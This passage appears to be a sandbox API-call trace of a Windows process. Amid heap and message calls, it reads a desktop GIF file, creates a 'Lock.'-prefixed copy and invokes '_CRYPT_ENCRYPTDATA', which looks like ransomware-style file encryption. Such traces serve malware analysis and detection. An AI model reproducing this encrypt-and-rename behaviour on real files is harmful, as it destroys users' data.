(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0139.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0139.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0139.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0139.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0139.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0139.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0139.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0139.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0139.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0139.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0139.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0139.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0139.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0139.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0139.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0139.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f05008 [0139.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0139.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0139.907] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/cggtx8L.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\cggtx8l.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0139.908] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.908] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0139.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0139.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0139.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0139.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0139.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0139.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0139.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0139.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0139.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0139.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0139.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0139.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0139.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0139.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0139.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.909] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0139.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0139.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0139.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0139.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f15010 [0139.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0139.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0139.910] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.cggtx8L.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.cggtx8l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0139.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0139.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0139.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0139.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0139.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0139.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0139.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0139.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0139.954] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0139.955] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0139.955] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0139.955] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0139.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0139.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0139.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3be2020 [0139.962] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0139.962] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f05008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f05008*, lpNumberOfBytesRead=0x8cf4f8*=0x2a7d, lpOverlapped=0x0) returned 1 [0139.965] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f05008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f05008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0139.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0139.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a7d) returned 0x2f25018 [0139.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be2020 | out: hHeap=0x970000) returned 1 [0139.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0139.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0139.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0139.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0139.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0139.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a7d) returned 0x2f27aa0 [0139.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f25018 | out: hHeap=0x970000) returned 1 [0139.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.969] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0139.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0139.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0139.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a7d) returned 0x2f25018 [0139.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f25018 | out: hHeap=0x970000) returned 1 [0139.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0139.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0139.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0139.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.970] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0139.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0139.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0139.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0139.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0139.970] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0139.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0139.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0139.970] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0139.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0139.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a7d) returned 0x2f25018 [0139.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0139.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0139.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a7d) returned 0x2f2a528 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0139.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0139.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0139.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0139.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0139.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0139.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0139.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0139.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0139.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0139.974] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0139.974] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.974] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.974] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.974] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.974] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 